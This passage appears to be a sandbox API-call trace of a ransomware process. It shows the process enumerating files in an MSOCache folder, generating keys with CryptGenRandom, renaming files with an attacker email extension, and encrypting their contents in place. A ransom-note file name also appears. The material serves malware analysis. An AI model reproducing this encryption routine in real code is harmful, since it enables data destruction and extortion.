	[0075.463] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0075.463] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0075.463] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0075.463] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db4c8 | out: hHeap=0x540000) returned 1
	[0075.463] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db420 | out: hHeap=0x540000) returned 1
	[0075.463] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x90) returned 0x5db1a0
	[0075.463] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db388 | out: hHeap=0x540000) returned 1
	[0075.463] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5891a0 | out: hHeap=0x540000) returned 1
	[0075.463] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5800 | out: hHeap=0x540000) returned 1
	[0075.463] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9ec5930, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9ec5930, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da1f0
	[0075.463] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0075.463] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0075.463] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5891a0
	[0075.463] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0075.463] GetLastError () returned 0x0
	[0075.464] FindNextFileW (in: hFindFile=0x5da1f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9ec5930, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9ec5930, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0075.464] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0075.464] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0075.464] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5891a0
	[0075.464] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0075.464] GetLastError () returned 0x0
	[0075.464] FindNextFileW (in: hFindFile=0x5da1f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf79111d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1200204, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="InfLR.cab", cAlternateFileName="")) returned 1
	[0075.464] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0075.464] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0075.464] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5891a0
	[0075.464] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0075.464] GetLastError () returned 0x0
	[0075.464] FindNextFileW (in: hFindFile=0x5da1f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e58f90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2fac00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="InfoPathMUI.msi", cAlternateFileName="INFOPA~1.MSI")) returned 1
	[0075.464] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0075.464] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0075.464] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5891a0
	[0075.464] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0075.464] GetLastError () returned 0x0
	[0075.464] FindNextFileW (in: hFindFile=0x5da1f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e345a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x4cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="InfoPathMUI.xml", cAlternateFileName="INFOPA~1.XML")) returned 1
	[0075.464] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0075.464] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0075.464] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5891a0
	[0075.464] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0075.464] GetLastError () returned 0x0
	[0075.464] FindNextFileW (in: hFindFile=0x5da1f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x73c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1
	[0075.464] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0075.464] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0075.464] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5891a0
	[0075.464] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0075.464] GetLastError () returned 0x0
	[0075.464] FindNextFileW (in: hFindFile=0x5da1f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9ec5930, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9ec5930, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9ec5930, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0075.465] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0075.465] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0075.465] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5891a0
	[0075.465] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0075.465] GetLastError () returned 0x0
	[0075.465] FindNextFileW (in: hFindFile=0x5da1f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9ec5930, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9ec5930, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9ec5930, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0075.465] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5db628
	[0075.465] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0075.465] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0075.465] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0075.465] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0075.465] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1
	[0075.465] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73
	[0075.465] GetProcessHeap () returned 0x540000
	[0075.465] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x5db6d0
	[0075.465] lstrcpyW (in: lpString1=0x5db6d0, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml"
	[0075.465] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0075.465] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0075.468] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478
	[0075.468] GetProcessHeap () returned 0x540000
	[0075.468] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db6d0 | out: hHeap=0x540000) returned 1
	[0075.468] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1852) returned 1
	[0075.468] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x73c
	[0075.468] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0075.468] GetProcessHeap () returned 0x540000
	[0075.468] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0075.468] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0075.469] WriteFile (in: hFile=0x478, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0075.470] WriteFile (in: hFile=0x478, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0075.470] WriteFile (in: hFile=0x478, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0075.470] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x73c) returned 0x5db6d0
	[0075.470] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x73c) returned 0x5dbe18
	[0075.470] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0075.470] ReadFile (in: hFile=0x478, lpBuffer=0x5db6d0, nNumberOfBytesToRead=0x73c, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db6d0*, lpNumberOfBytesRead=0x3a1f778*=0x73c, lpOverlapped=0x0) returned 1
	[0075.470] SetFilePointer (in: hFile=0x478, lDistanceToMove=-1852, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0075.471] WriteFile (in: hFile=0x478, lpBuffer=0x5dbe18*, nNumberOfBytesToWrite=0x73c, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5dbe18*, lpNumberOfBytesWritten=0x3a1f778*=0x73c, lpOverlapped=0x0) returned 1
	[0075.471] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db6d0 | out: hHeap=0x540000) returned 1
	[0075.471] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5dbe18 | out: hHeap=0x540000) returned 1
	[0075.471] CloseHandle (hObject=0x478) returned 1
	[0075.471] GetProcessHeap () returned 0x540000
	[0075.471] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0075.471] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0075.471] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0075.471] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db628 | out: hHeap=0x540000) returned 1
	[0075.471] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db580 | out: hHeap=0x540000) returned 1
	[0075.471] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5db580
	[0075.472] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0075.472] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0075.472] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0075.472] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0075.472] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", dwFileAttributes=0x80) returned 1
	[0075.472] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 79
	[0075.472] GetProcessHeap () returned 0x540000
	[0075.472] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x104) returned 0x5db628
	[0075.472] lstrcpyW (in: lpString1=0x5db628, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml"
	[0075.472] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0075.472] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0075.474] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478
	[0075.474] GetProcessHeap () returned 0x540000
	[0075.474] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db628 | out: hHeap=0x540000) returned 1
	[0075.474] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1231) returned 1
	[0075.474] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x4cf
	[0075.474] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0075.474] GetProcessHeap () returned 0x540000
	[0075.474] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0075.474] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0075.474] WriteFile (in: hFile=0x478, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0075.476] WriteFile (in: hFile=0x478, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0075.476] WriteFile (in: hFile=0x478, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0075.476] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4cf) returned 0x5db628
	[0075.476] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4cf) returned 0x5dbb00
	[0075.476] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0075.476] ReadFile (in: hFile=0x478, lpBuffer=0x5db628, nNumberOfBytesToRead=0x4cf, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db628*, lpNumberOfBytesRead=0x3a1f778*=0x4cf, lpOverlapped=0x0) returned 1
	[0075.476] SetFilePointer (in: hFile=0x478, lDistanceToMove=-1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0075.476] WriteFile (in: hFile=0x478, lpBuffer=0x5dbb00*, nNumberOfBytesToWrite=0x4cf, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5dbb00*, lpNumberOfBytesWritten=0x3a1f778*=0x4cf, lpOverlapped=0x0) returned 1
	[0075.476] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db628 | out: hHeap=0x540000) returned 1
	[0075.477] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5dbb00 | out: hHeap=0x540000) returned 1
	[0075.477] CloseHandle (hObject=0x478) returned 1
	[0075.477] GetProcessHeap () returned 0x540000
	[0075.477] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0075.477] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0075.477] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0075.477] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db580 | out: hHeap=0x540000) returned 1
	[0075.477] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db4d8 | out: hHeap=0x540000) returned 1
	[0075.477] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5db4d8
	[0075.477] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0075.477] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0075.477] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0075.477] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0075.477] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi", dwFileAttributes=0x80) returned 1
	[0075.478] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 79
	[0075.478] GetProcessHeap () returned 0x540000
	[0075.478] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x104) returned 0x5db580
	[0075.478] lstrcpyW (in: lpString1=0x5db580, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi"
	[0075.479] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0075.479] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0075.481] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478
	[0075.481] GetProcessHeap () returned 0x540000
	[0075.481] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db580 | out: hHeap=0x540000) returned 1
	[0075.481] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=3124224) returned 1
	[0075.481] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x2fac00
	[0075.481] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0075.481] GetProcessHeap () returned 0x540000
	[0075.481] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
